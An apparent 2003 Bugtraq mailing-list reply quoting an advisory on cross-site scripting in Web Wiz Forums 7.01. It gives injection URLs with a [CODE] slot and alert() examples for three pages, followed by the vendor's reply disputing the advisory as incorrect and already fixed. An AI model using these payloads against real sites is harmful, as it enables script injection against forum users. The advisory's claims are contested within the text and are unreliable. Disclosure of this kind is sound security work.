In-Reply-To: <18150849207.20031022004135@hex.net.ru> >Received: (qmail 24988 invoked from network); 21 Oct 2003 22:17:00 -0000 >Received: from outgoing3.securityfocus.com (205.206.231.27) > by mail.securityfocus.com with SMTP; 21 Oct 2003 22:17:00 -0000 >Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20]) > by outgoing3.securityfocus.com (Postfix) with QMQP > id D98A8A30C6; Tue, 21 Oct 2003 16:22:51 -0600 (MDT) >Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm >Precedence: bulk >List-Id: <bugtraq.list-id.securityfocus.com> >List-Post: <mailto:bugtraq@securityfocus.com> >List-Help: <mailto:bugtraq-help@securityfocus.com> >List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com> >List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com> >Delivered-To: mailing list bugtraq@securityfocus.com >Delivered-To: moderator for bugtraq@securityfocus.com >Received: (qmail 27315 invoked from network); 21 Oct 2003 14:38:48 -0000 >Date: Wed, 22 Oct 2003 00:41:35 +0400 >From: HEX <hex@hex.net.ru> >X-Mailer: The Bat! (v2.00) CD5BF9353B3B7091 >Reply-To: HEX <hex@hex.net.ru> >X-Priority: 3 (Normal) >Message-ID: <18150849207.20031022004135@hex.net.ru> >To: bugtraq@securityfocus.com, info@webwizguide.info >Subject: Web Wiz Forums ver. 7.01 >MIME-Version: 1.0 >Content-Type: text/plain; charset=Windows-1251 >Content-Transfer-Encoding: 8bit > >Informations : >°°°°°°°°°°°° >Language : ASP >Bugged Version : Web Wiz Forums ver. 7.01 (and less ?) >Patched version : none >Website : http://www.webwizforums.com >Problems : Permanent XSS > >Objects : >°°°°°°° >- forum_members.asp >- members.asp > >- pm_buddy_list.asp > >Exploits : >°°°°°°°° >http://[TARGET]/forum_members.asp?find=%22;}[CODE];function%20x(){v%20=%22 > >Example: http://[TARGET]/forum_members.asp?find=%22;}ALERT('XSS atack by [HEX] (c) [CSL]');function%20x(){v%20=%22 > >http://[TARGET]/members.asp?SF=%22;}[CODE]function%20x(){v%20=%22 > >Example: http://[TARGET]/members.asp?SF=%22;}ALERT('XSS atack by [HEX] (c) [CSL]');function%20x(){v%20=%22 > >http://[TARGET]/pm_buddy_list.asp?name=A&desc=B%22%3E[CODE]%3Ca%20s=%22&code=1 > >Example: http://[TARGET]/pm_buddy_list.asp?name=A&desc=B%22%3E<SCRIPT>ALERT('XSS atack by [HEX] (c) [CSL]');</SCRIPT>%3Ca%20s=%22&code=1 > >Patch/More Details : >°°°°°°°°°°°°°°°°°° >Waiting for the patch at http://www.webwizforums.com... > > >[ Local time 2:30 | Åñëè á ìèøêè áûëè ï÷åëàìè... ] >[ Copyright by [HEX] | mailto:hex@hex.net.ru ] > > > This infomation is incorrect. Not only does Web Wiz Forums 7.01 not contain a file called forum_members.asp, but this minor XXS issue was resolved more than 6 months ago and doesn't effect the latest version which is in version 7.5
